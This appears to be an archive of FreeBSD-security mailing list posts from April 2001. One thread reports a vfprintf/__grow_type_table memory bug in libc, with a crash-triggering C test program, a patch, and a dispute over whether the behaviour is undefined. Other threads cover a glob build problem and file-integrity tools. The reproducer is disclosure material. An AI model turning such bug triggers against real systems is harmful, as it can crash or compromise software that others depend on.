homepage.ru (spb-3-28.dialup.peterlink.ru [195.242.18.28]) by homepage.ru (8.9.3/8.9.3) with ESMTP id AAA67007 for ; Fri, 20 Apr 2001 00:39:27 +0400 (MSD) (envelope-from dk@homepage.ru) Message-ID: <3ADF4DD0.17AB0F64@homepage.ru> Date: Fri, 20 Apr 2001 00:42:56 +0400 From: "D. K." X-Mailer: Mozilla 4.74 [en] (X11; U; FreeBSD 4.2-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: security@FreeBSD.ORG Subject: FreeBSD grow bug Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello All! I played with format string in *printf functions and have found bug in libc library on my FreeBSD 4.2-RELEASE machine. The bug is in the /usr/src/lib/libc/stdio/vfprintf.c source, in function __grow_type_table, which is used by function vfprintf. The first parameter of the memset function is incorrectly counted up. All *printf functions which use vfprintf have this error. Test example: ===beg test.c=== #include int main(int argc, char *argv) { printf("%7$x\n", 1, 2, 3, 4, 5, 6, 7); printf("%8$x\n", 1, 2, 3, 4, 5, 6, 7, 8); printf("no grow bug\n"); return 0; } ===end test.c=== Results: # ./test 7 Segmentation fault (core dumped) If you have seen the eight it means that your system has no this bug. The error appears when the parameter after % more than seven. Quick patch: ===beg grow_patch=== --- vfprintf.c.old Sat Aug 28 04:01:20 1999 +++ vfprintf.c Thu Apr 19 22:16:19 2001 @@ -1191,7 +1191,7 @@ reallocf (typetable, sizeof (unsigned char) * newsize); } - memset (&typetable [*tablesize], T_UNUSED, (newsize - *tablesize)); + memset (*typetable + *tablesize, T_UNUSED, (newsize - *tablesize)); *tablesize = newsize; } ===end grow_patch=== Best Regards, Dmitry Kopteloff --- LG Soft Lab. Information Security Group, RUSSIA To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 13:40:48 2001 Delivered-To: freebsd-security@freebsd.org Received: from uadvg134.cms.usa.net (uadvg134.cms.usa.net [165.212.11.134]) by hub.freebsd.org (Postfix) with SMTP id 3D5DE37B62A for ; Thu, 19 Apr 2001 13:40:42 -0700 (PDT) (envelope-from briant@packeteer.com) Received: (qmail 13621 invoked from network); 19 Apr 2001 20:40:41 -0000 Received: from uadvg128.cms.usa.net (165.212.11.128) by corprelay.cms.usa.net with SMTP; 19 Apr 2001 20:40:41 -0000 Received: (qmail 28603 invoked by uid 0); 19 Apr 2001 20:40:41 -0000 Received: USA.NET MXFirewall, messaging filters applied; Thu, 19 Apr 2001 20:40:38 GMT Received: from packeteer.com [207.78.98.2] by uadvg128 (ASMTP/briant@postoffice.packeteer.com) via mtad (53CM.0401.1.03) with ESMTP id 414FDsunY0036M16; Thu, 19 Apr 2001 20:39:50 GMT Message-ID: <3ADF4D4E.DCD96209@packeteer.com> Date: Thu, 19 Apr 2001 13:40:46 -0700 From: Brian Tiemann Organization: Packeteer, Inc. X-Mailer: Mozilla 4.74 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: Chris Faulhaber Cc: security@freebsd.org Subject: Re: Another glob problem References: <3ADF4965.6253D0B7@packeteer.com> <20010419162543.G81766@peitho.fxp.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Yes, that's what I thought. It's RELENG_4, and I didn't apply the patch. I also tried multiple make cleans, and also deleting /usr/src/lib/libc/db/mpool and rebuilding. Same problem. I've disabled my ftpd for now, until we can figure this out. This must be a particularly amorphous code region across different systems. Brian Chris Faulhaber wrote: > > On Thu, Apr 19, 2001 at 01:24:05PM -0700, Brian Tiemann wrote: > > > I'm running 4.2-RELEASE, with the March 22 glob.h installed in /usr/src > > > and a fresh make world as of about ten minutes ago. > > > > Argh... let me rephrase that. > > > > I'm running 4.2-RELEASE, with the March 22 glob.h installed in > > /usr/include (it's the glob.h that defines GLOB_MAXPATH, so it seems to > > be the right one) and a fresh cvsup as of about ten minutes ago. > > > > Yeesh.. > > > > A fresh cvsup of RELENG_4 or RELENG_4_2_0_RELEASE? If it is the former, > the patch is not required. > > -- > Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org > -------------------------------------------------------- > FreeBSD: The Power To Serve - http://www.FreeBSD.org > > ------------------------------------------------------------------------ > Part 1.2Type: application/pgp-signature To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 13:42:54 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.wlcg.com (mail.wlcg.com [207.226.17.4]) by hub.freebsd.org (Postfix) with ESMTP id DEA9537B43E for ; Thu, 19 Apr 2001 13:42:44 -0700 (PDT) (envelope-from rsimmons@wlcg.com) Received: from localhost (rsimmons@localhost) by mail.wlcg.com (8.11.3/8.11.3) with ESMTP id f3JKgiC77921; Thu, 19 Apr 2001 16:42:44 -0400 (EDT) (envelope-from rsimmons@wlcg.com) Date: Thu, 19 Apr 2001 16:42:39 -0400 (EDT) From: Rob Simmons To: "D. K." Cc: Subject: Re: FreeBSD grow bug In-Reply-To: <3ADF4DD0.17AB0F64@homepage.ru> Message-ID: <20010419164112.C72854-100000@mail.wlcg.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: RIPEMD160 That has been fixed since 4.2-RELEASE. Robert Simmons Systems Administrator http://www.wlcg.com/ On Fri, 20 Apr 2001, D. K. wrote: > Hello All! > > I played with format string in *printf functions > and have found bug in libc library on my FreeBSD 4.2-RELEASE > machine. > > The bug is in the /usr/src/lib/libc/stdio/vfprintf.c source, > in function __grow_type_table, which is used by function > vfprintf. The first parameter of the memset function is > incorrectly counted up. All *printf functions which use > vfprintf have this error. > > Test example: > ===beg test.c=== > #include > > int main(int argc, char *argv) { > printf("%7$x\n", 1, 2, 3, 4, 5, 6, 7); > printf("%8$x\n", 1, 2, 3, 4, 5, 6, 7, 8); > printf("no grow bug\n"); > return 0; > } > ===end test.c=== > > Results: > # ./test > 7 > Segmentation fault (core dumped) > > If you have seen the eight it means that your system > has no this bug. > > The error appears when the parameter after % more than seven. > > Quick patch: > ===beg grow_patch=== > --- vfprintf.c.old Sat Aug 28 04:01:20 1999 > +++ vfprintf.c Thu Apr 19 22:16:19 2001 > @@ -1191,7 +1191,7 @@ > reallocf (typetable, sizeof (unsigned char) * newsize); > > } > - memset (&typetable [*tablesize], T_UNUSED, (newsize - *tablesize)); > + memset (*typetable + *tablesize, T_UNUSED, (newsize - *tablesize)); > > *tablesize = newsize; > } > ===end grow_patch=== > > > Best Regards, > Dmitry Kopteloff > --- > LG Soft Lab. > Information Security Group, RUSSIA > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6303Ev8Bofna59hYRA9gxAKCYvnJ3ca8N7ZskTfzx6ViknZWwCQCgvpDK idd2LjNLtUqHqjcsX0IKa0A= =/OWA -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 13:43: 0 2001 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 9959A37B440 for ; Thu, 19 Apr 2001 13:42:54 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id QAA40625; Thu, 19 Apr 2001 16:42:40 -0400 (EDT) (envelope-from wollman) Date: Thu, 19 Apr 2001 16:42:40 -0400 (EDT) From: Garrett Wollman Message-Id: <200104192042.QAA40625@khavrinen.lcs.mit.edu> To: "D. K." Cc: security@FreeBSD.ORG Subject: FreeBSD grow bug In-Reply-To: <3ADF4DD0.17AB0F64@homepage.ru> References: <3ADF4DD0.17AB0F64@homepage.ru> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > int main(int argc, char *argv) { > printf("%7$x\n", 1, 2, 3, 4, 5, 6, 7); > printf("%8$x\n", 1, 2, 3, 4, 5, 6, 7, 8); > printf("no grow bug\n"); > return 0; > } This code is erroneous. If the format string does not reference all positional arguments up to and including the numerically greatest one named, the result of *printf() is undefined. This is not a security matter; replies to , please. -GAWollman To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 13:44:16 2001 Delivered-To: freebsd-security@freebsd.org Received: from mightymouse.BLACKBIRD.BLACKBIRDTECH.COM (host165.blackbirdtech.com [63.117.239.165]) by hub.freebsd.org (Postfix) with ESMTP id DEF2237B43E for ; Thu, 19 Apr 2001 13:44:07 -0700 (PDT) (envelope-from bvaughn@BlackbirdTech.com) content-class: urn:content-classes:message Subject: RE: Another glob problem MIME-Version: 1.0 Date: Thu, 19 Apr 2001 16:44:03 -0400 Content-Type: multipart/signed; protocol="application/x-pkcs7-signature"; micalg=SHA1; boundary="----=_NextPart_000_020E_01C0C8EF.F0C623F0" X-MimeOLE: Produced By Microsoft Exchange V6.0.4418.65 Message-ID: <0639433A0E004844AC0D1B91E0CF4D6308DA77@mightymouse.BLACKBIRD.BLACKBIRDTECH.COM> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: Another glob problem Thread-Index: AcDJEQtmgf6ZiiUcR22sKsZvptF7igAAF/pg From: "Ben Vaughn" To: "Brian Tiemann" , "Chris Faulhaber" Cc: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_020E_01C0C8EF.F0C623F0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit I am also experiencing this problem building from a 10-minute old stable-cvsup. -biv -----Original Message----- From: Brian Tiemann [mailto:briant@packeteer.com] Sent: Thursday, April 19, 2001 16:41 To: Chris Faulhaber Cc: security@freebsd.org Subject: Re: Another glob problem Yes, that's what I thought. It's RELENG_4, and I didn't apply the patch. I also tried multiple make cleans, and also deleting /usr/src/lib/libc/db/mpool and rebuilding. Same problem. I've disabled my ftpd for now, until we can figure this out. This must be a particularly amorphous code region across different systems. Brian Chris Faulhaber wrote: > > On Thu, Apr 19, 2001 at 01:24:05PM -0700, Brian Tiemann wrote: > > > I'm running 4.2-RELEASE, with the March 22 glob.h installed in /usr/src > > > and a fresh make world as of about ten minutes ago. > > > > Argh... let me rephrase that. > > > > I'm running 4.2-RELEASE, with the March 22 glob.h installed in > > /usr/include (it's the glob.h that defines GLOB_MAXPATH, so it seems to > > be the right one) and a fresh cvsup as of about ten minutes ago. > > > > Yeesh.. > > > > A fresh cvsup of RELENG_4 or RELENG_4_2_0_RELEASE? If it is the former, > the patch is not required. > > -- > Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org > -------------------------------------------------------- > FreeBSD: The Power To Serve - http://www.FreeBSD.org > > ------------------------------------------------------------------------ > Part 1.2Type: application/pgp-signature To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message ------=_NextPart_000_020E_01C0C8EF.F0C623F0 Content-Type: application/x-pkcs7-signature; name="smime.p7s" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="smime.p7s" MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIIJfzCCAj0w ggGmAhEAzbp/VvDf5LxU/iKss3KqVTANBgkqhkiG9w0BAQIFADBfMQswCQYDVQQGEwJVUzEXMBUG A1UEChMOVmVyaVNpZ24sIEluYy4xNzA1BgNVBAsTLkNsYXNzIDEgUHVibGljIFByaW1hcnkgQ2Vy dGlmaWNhdGlvbiBBdXRob3JpdHkwHhcNOTYwMTI5MDAwMDAwWhcNMjgwODAxMjM1OTU5WjBfMQsw CQYDVQQGEwJVUzEXMBUGA1UEChMOVmVyaVNpZ24sIEluYy4xNzA1BgNVBAsTLkNsYXNzIDEgUHVi bGljIFByaW1hcnkgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkwgZ8wDQYJKoZIhvcNAQEBBQADgY0A MIGJAoGBAOUZv22jVmEtmUhx9mfeuY3rt56GgAqRDvo4Ja9GiILlc6igmyRdDR/MZW4MsNBWhBiH mgabEKFz37RYOWtuwfYV1aioP6oSBo0xrH+wNNePNGeICc0UEeJORVZpH3gCgNrcR5EpuzbJY1zF 4Ncth3uhtzKwezC6Ki8xqu6jZ9rbAgMBAAEwDQYJKoZIhvcNAQECBQADgYEATD+4i8Zo3+5DMw5d 6abLB4RNejP/khv0Nq3YlSI2aBFsfELM85wuxAc/FLAPT/+Qknb54rxK6Y/NoIAK98Up8YIiXbix 3YEjo3slFUYweRb46gVLlH8dwhzI47f0EEA8E8NfH1PoSOSGtHuhNbB7Jbq4046rPzidADQAmPPR cZQwggMuMIICl6ADAgECAhEA0nYujRQMPX2yqCVdr+4NdTANBgkqhkiG9w0BAQIFADBfMQswCQYD VQQGEwJVUzEXMBUGA1UEChMOVmVyaVNpZ24sIEluYy4xNzA1BgNVBAsTLkNsYXNzIDEgUHVibGlj IFByaW1hcnkgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkwHhcNOTgwNTEyMDAwMDAwWhcNMDgwNTEy MjM1OTU5WjCBzDEXMBUGA1UEChMOVmVyaVNpZ24sIEluYy4xHzAdBgNVBAsTFlZlcmlTaWduIFRy dXN0IE5ldHdvcmsxRjBEBgNVBAsTPXd3dy52ZXJpc2lnbi5jb20vcmVwb3NpdG9yeS9SUEEgSW5j b3JwLiBCeSBSZWYuLExJQUIuTFREKGMpOTgxSDBGBgNVBAMTP1ZlcmlTaWduIENsYXNzIDEgQ0Eg SW5kaXZpZHVhbCBTdWJzY3JpYmVyLVBlcnNvbmEgTm90IFZhbGlkYXRlZDCBnzANBgkqhkiG9w0B AQEFAAOBjQAwgYkCgYEAu1pEigQWu1X9A3qKLZRPFXg2uA1Ksm+cVL+86HcqnbnwaLuV2TFBcHqB S7lIE1YtxwjhhEKrwKKSq0RcqkLwgg4C6S/7wju7vsknCl22sDZCM7VuVIhPh0q/Gdr5FegPh7Yc 48zGmo5/aiSS4/zgZbqnsX7vyds3ashKyAkG5JkCAwEAAaN8MHowEQYJYIZIAYb4QgEBBAQDAgEG MEcGA1UdIARAMD4wPAYLYIZIAYb4RQEHAQEwLTArBggrBgEFBQcCARYfd3d3LnZlcmlzaWduLmNv bS9yZXBvc2l0b3J5L1JQQTAPBgNVHRMECDAGAQH/AgEAMAsGA1UdDwQEAwIBBjANBgkqhkiG9w0B AQIFAAOBgQCIuDc73dqUNwCtqp/hgQFxHpJqbS/28Z3TymQ43BuYDAeGW4UVag+5SYWklfEXfWe0 fy0s3ZpCnsM+tI6q5QsG3vJWKvozx74Z11NMw73I4xe1pElCY+zCphcPXVgaSTyQXFWjZSAA/Rgg 5V+CprGoksVYasGNAzzrw80FopCubjCCBAgwggNxoAMCAQICEHnlg8wO1LIDbxDhdM85XKkwDQYJ KoZIhvcNAQEEBQAwgcwxFzAVBgNVBAoTDlZlcmlTaWduLCBJbmMuMR8wHQYDVQQLExZWZXJpU2ln biBUcnVzdCBOZXR3b3JrMUYwRAYDVQQLEz13d3cudmVyaXNpZ24uY29tL3JlcG9zaXRvcnkvUlBB IEluY29ycC4gQnkgUmVmLixMSUFCLkxURChjKTk4MUgwRgYDVQQDEz9WZXJpU2lnbiBDbGFzcyAx IENBIEluZGl2aWR1YWwgU3Vic2NyaWJlci1QZXJzb25hIE5vdCBWYWxpZGF0ZWQwHhcNMDEwMTIy MDAwMDAwWhcNMDIwMTIyMjM1OTU5WjCCARcxFzAVBgNVBAoTDlZlcmlTaWduLCBJbmMuMR8wHQYD VQQLExZWZXJpU2lnbiBUcnVzdCBOZXR3b3JrMUYwRAYDVQQLEz13d3cudmVyaXNpZ24uY29tL3Jl cG9zaXRvcnkvUlBBIEluY29ycC4gYnkgUmVmLixMSUFCLkxURChjKTk4MR4wHAYDVQQLExVQZXJz b25hIE5vdCBWYWxpZGF0ZWQxNDAyBgNVBAsTK0RpZ2l0YWwgSUQgQ2xhc3MgMSAtIE1pY3Jvc29m dCBGdWxsIFNlcnZpY2UxEzARBgNVBAMUCkJlbiBWYXVnaG4xKDAmBgkqhkiG9w0BCQEWGWJ2YXVn aG5AYmxhY2tiaXJkdGVjaC5jb20wgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMQZAlH6BYXu n6vNuuDDQiam3tVSk2i6uoIUbSxeb3TwKsObk6dP2L9XGH7AqoLr5IL2QX2nPyNmwE36gZYCU9Ts 9/DtV7vQ3L8NpkXptGt82IdbcwoxgeXPQQxDLc5lhd6vqefm4Fue2GbWo2hLFI5G0DUJ2XpEX1/k R0WQiHPRAgMBAAGjgZwwgZkwCQYDVR0TBAIwADBEBgNVHSAEPTA7MDkGC2CGSAGG+EUBBwEIMCow KAYIKwYBBQUHAgEWHGh0dHBzOi8vd3d3LnZlcmlzaWduLmNvbS9ycGEwEQYJYIZIAYb4QgEBBAQD AgeAMDMGA1UdHwQsMCowKKAmoCSGImh0dHA6Ly9jcmwudmVyaXNpZ24uY29tL2NsYXNzMS5jcmww DQYJKoZIhvcNAQEEBQADgYEAnNpr1Nk+aEhXtVfZzZX/MdC59K65Dv4UNnYZCDrYmAvv0ESTPvkk slaOGDplT+lIAf/JxQS5GKZYuGnxohylT4jpC4NXJo93t+bs+2ILrLcnqvbJaqz46JM52K+4Me5N 4qNbAC7QA2FbIBYEj04E5Qb6oQcRzBQpUQfJPddJFVoxggM4MIIDNAIBATCB4TCBzDEXMBUGA1UE ChMOVmVyaVNpZ24sIEluYy4xHzAdBgNVBAsTFlZlcmlTaWduIFRydXN0IE5ldHdvcmsxRjBEBgNV BAsTPXd3dy52ZXJpc2lnbi5jb20vcmVwb3NpdG9yeS9SUEEgSW5jb3JwLiBCeSBSZWYuLExJQUIu TFREKGMpOTgxSDBGBgNVBAMTP1ZlcmlTaWduIENsYXNzIDEgQ0EgSW5kaXZpZHVhbCBTdWJzY3Jp YmVyLVBlcnNvbmEgTm90IFZhbGlkYXRlZAIQeeWDzA7UsgNvEOF0zzlcqTAJBgUrDgMCGgUAoIIB rDAYBgkqhkiG9w0BCQMxCwYJKoZIhvcNAQcBMBwGCSqGSIb3DQEJBTEPFw0wMTA0MTkyMDQ0MDJa MCMGCSqGSIb3DQEJBDEWBBQgYcTWg/GuHowKxtqxKVeTxMSZUDBYBgkqhkiG9w0BCQ8xSzBJMAoG CCqGSIb3DQMHMA4GCCqGSIb3DQMCAgIAgDAHBgUrDgMCBzANBggqhkiG9w0DAgIBKDAHBgUrDgMC GjAKBggqhkiG9w0CBTCB8gYJKwYBBAGCNxAEMYHkMIHhMIHMMRcwFQYDVQQKEw5WZXJpU2lnbiwg SW5jLjEfMB0GA1UECxMWVmVyaVNpZ24gVHJ1c3QgTmV0d29yazFGMEQGA1UECxM9d3d3LnZlcmlz aWduLmNvbS9yZXBvc2l0b3J5L1JQQSBJbmNvcnAuIEJ5IFJlZi4sTElBQi5MVEQoYyk5ODFIMEYG A1UEAxM/VmVyaVNpZ24gQ2xhc3MgMSBDQSBJbmRpdmlkdWFsIFN1YnNjcmliZXItUGVyc29uYSBO b3QgVmFsaWRhdGVkAhB55YPMDtSyA28Q4XTPOVypMA0GCSqGSIb3DQEBAQUABIGAMO/zDUPeeSL4 xZOnhH1gSHKx29oNSB4qXgzKZB+qE3bGrDCqBiR+wZWcKQolrbC93SgNAFNygBF9pomjxjXK3jYU HVM3CuNQInomrhRa8PAgF/09k/SF/PYrChibWTfbJhikH9z0PcnN9s03E52m/FeqzbtAJ9Alcrx7 VjGAcS8AAAAAAAA= ------=_NextPart_000_020E_01C0C8EF.F0C623F0-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 13:45: 4 2001 Delivered-To: freebsd-security@freebsd.org Received: from ceasefire.bitstream.net (ceasefire.bitstream.net [216.243.128.220]) by hub.freebsd.org (Postfix) with SMTP id EA2AD37B422 for ; Thu, 19 Apr 2001 13:45:01 -0700 (PDT) (envelope-from airboss@bitstream.net) Received: (qmail 47955 invoked from network); 19 Apr 2001 20:45:01 -0000 Received: from unknown (HELO dmitri.bitstream.net) (216.243.132.33) by ceasefire with SMTP; 19 Apr 2001 20:45:01 -0000 Date: Thu, 19 Apr 2001 15:29:46 -0500 (CDT) From: Dan Debertin To: "freebsd-security@freebsd.org" Subject: Re: Tripwire or the like for FreeBSD ? In-Reply-To: <3ADF3CCC.FB8498DC@emre.de> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=X-UNKNOWN Content-Transfer-Encoding: QUOTED-PRINTABLE Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 19 Apr 2001, Emre Bastuz wrote: > > I found something called "Aide" in the ports directory, but to be honest = - > I don=B4t trust a "Version 0.7" when it comes to security. Nothing wrong with honesty. Lots of software released as "1.0" or "5.2" is actually no better than beta-quality. ProFTPd and GNOME both come to mind.... Conversely, I've used plenty of very stable software that hasn't hit 1.0 yet. In specific reference to AIDE, we use it here. It's a huge memory hog and is painful to work with. It's worse than tripwire in terms of ease of administration, but it does the job. The config file syntax is nicer, though. Dan Debertin -- ++ I do not drink tea. ++ Dan Debertin ++ Senior Systems Administrator ++ Bitstream Underground, LLC ++ airboss@bitstream.net ++ (612)321-9290 x108 ++ GPG Fingerprint: 0BC5 F4D6 649F D0C8 D1A7 CAE4 BEF4 0A5C 300D 2387 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 13:52:58 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.wlcg.com (mail.wlcg.com [207.226.17.4]) by hub.freebsd.org (Postfix) with ESMTP id 9AE4E37B424 for ; Thu, 19 Apr 2001 13:52:53 -0700 (PDT) (envelope-from rsimmons@wlcg.com) Received: from localhost (rsimmons@localhost) by mail.wlcg.com (8.11.3/8.11.3) with ESMTP id f3JKrD078371; Thu, 19 Apr 2001 16:53:13 -0400 (EDT) (envelope-from rsimmons@wlcg.com) Date: Thu, 19 Apr 2001 16:53:09 -0400 (EDT) From: Rob Simmons To: Ben Vaughn Cc: Brian Tiemann , Chris Faulhaber , Subject: RE: Another glob problem In-Reply-To: <0639433A0E004844AC0D1B91E0CF4D6308DA77@mightymouse.BLACKBIRD.BLACKBIRDTECH.COM> Message-ID: <20010419164947.M72854-100000@mail.wlcg.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: RIPEMD160 Have you tried moving your kernel config file, and any other files that you need from /usr/src to /root, then delete the whole /usr/src, /usr/obj, and /usr/sup/src-all directories before running cvsup? When you are done, just move your kernel config file back where it belongs, and try again. Robert Simmons Systems Administrator http://www.wlcg.com/ On Thu, 19 Apr 2001, Ben Vaughn wrote: > I am also experiencing this problem building from a 10-minute > old stable-cvsup. > > -biv > > -----Original Message----- > From: Brian Tiemann [mailto:briant@packeteer.com] > Sent: Thursday, April 19, 2001 16:41 > To: Chris Faulhaber > Cc: security@freebsd.org > Subject: Re: Another glob problem > > > Yes, that's what I thought. It's RELENG_4, and I didn't apply > the > patch. > > I also tried multiple make cleans, and also deleting > /usr/src/lib/libc/db/mpool and rebuilding. Same problem. > > I've disabled my ftpd for now, until we can figure this out. > This must > be a particularly amorphous code region across different systems. > > Brian > > > Chris Faulhaber wrote: > > > > On Thu, Apr 19, 2001 at 01:24:05PM -0700, Brian Tiemann wrote: > > > > I'm running 4.2-RELEASE, with the March 22 glob.h > installed in /usr/src > > > > and a fresh make world as of about ten minutes ago. > > > > > > Argh... let me rephrase that. > > > > > > I'm running 4.2-RELEASE, with the March 22 glob.h installed in > > > /usr/include (it's the glob.h that defines GLOB_MAXPATH, so it seems > to > > > be the right one) and a fresh cvsup as of about ten minutes ago. > > > > > > Yeesh.. > > > > > > > A fresh cvsup of RELENG_4 or RELENG_4_2_0_RELEASE? If it is the > former, > > the patch is not required. > > > > -- > > Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org > > -------------------------------------------------------- > > FreeBSD: The Power To Serve - http://www.FreeBSD.org > > > > > ------------------------------------------------------------------------ > > Part 1.2Type: application/pgp-signature > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE631A4v8Bofna59hYRA7E1AKCR471HSFYBJ8A3+TWvMUhqvVz0/gCeNq97 Mb2yaPe8OCRg/SdsWtCkeus= =X5+F -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 14: 6: 2 2001 Delivered-To: freebsd-security@freebsd.org Received: from homepage.ru (homepage.ru [195.242.9.13]) by hub.freebsd.org (Postfix) with ESMTP id ECA9037B423 for ; Thu, 19 Apr 2001 14:05:58 -0700 (PDT) (envelope-from dk@homepage.ru) Received: from homepage.ru (spb-3-28.dialup.peterlink.ru [195.242.18.28]) by homepage.ru (8.9.3/8.9.3) with ESMTP id BAA68044; Fri, 20 Apr 2001 01:06:57 +0400 (MSD) (envelope-from dk@homepage.ru) Message-ID: <3ADF5442.BD703D6@homepage.ru> Date: Fri, 20 Apr 2001 01:10:26 +0400 From: "D. K." X-Mailer: Mozilla 4.74 [en] (X11; U; FreeBSD 4.2-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: Garrett Wollman , security@FreeBSD.ORG Subject: Re: FreeBSD grow bug References: <3ADF4DD0.17AB0F64@homepage.ru> <200104192042.QAA40625@khavrinen.lcs.mit.edu> Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Garrett Wollman wrote: > > < said: > > > int main(int argc, char *argv) { > > printf("%7$x\n", 1, 2, 3, 4, 5, 6, 7); > > printf("%8$x\n", 1, 2, 3, 4, 5, 6, 7, 8); > > printf("no grow bug\n"); > > return 0; > > } > > This code is erroneous. If the format string does not reference all > positional arguments up to and including the numerically greatest one > named, the result of *printf() is undefined. This is not a security > matter; replies to , please. You are not right;) See format string reference or next example: #include int main(int argc, char *argv) { char buf[100]; sprintf(buf, "%d%d%d%d%d%d%d %7$x\n", 1, 2, 3, 4, 5, 6, 7); printf("%s", buf); sprintf(buf, "%d%d%d%d%d%d%d%d %8$x\n", 1, 2, 3, 4, 5, 6, 7, 8); printf("%s", buf); printf("no grow bug\n"); return 0; } Best Regards, Dmitry Kopteloff --- LG Soft Lab. Information Security Group, RUSSIA To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 14:13:53 2001 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 9C2AF37B43C for ; Thu, 19 Apr 2001 14:13:40 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id RAA40978; Thu, 19 Apr 2001 17:13:31 -0400 (EDT) (envelope-from wollman) Date: Thu, 19 Apr 2001 17:13:31 -0400 (EDT) From: Garrett Wollman Message-Id: <200104192113.RAA40978@khavrinen.lcs.mit.edu> To: "D. K." Cc: security@FreeBSD.ORG, freebsd-standards@bostonradio.org Subject: Re: FreeBSD grow bug In-Reply-To: <3ADF5442.BD703D6@homepage.ru> References: <3ADF4DD0.17AB0F64@homepage.ru> <200104192042.QAA40625@khavrinen.lcs.mit.edu> <3ADF5442.BD703D6@homepage.ru> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > You are not right To quote from the Austin Group draft 6: The format can contain either numbered argument conversion specifications (that is, "%n$" and "*m$"), or unnumbered argument conversion specifications (that is, % and *), but not ^^^^^^^ both. The only exception to this is that %% can be mixed with ^^^^^ the "%n$" form. The results of mixing numbered and unnumbered argument specifications in a format string are undefined. When numbered argument specifications are used, specifying the Nth ^^^^^^^^^^^^^^^^^^ argument requires that all the leading arguments, from the ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ first to the (N-1)th, are specified in the format string. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ The exact same language, spread out over several paragraphs, appears in the Single UNIX Spec version 2. -GAWollman To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 14:47:53 2001 Delivered-To: freebsd-security@freebsd.org Received: from mailhub.airlinksys.com (mailhub.airlinksys.com [216.70.12.6]) by hub.freebsd.org (Postfix) with ESMTP id 8344537B422 for ; Thu, 19 Apr 2001 14:47:50 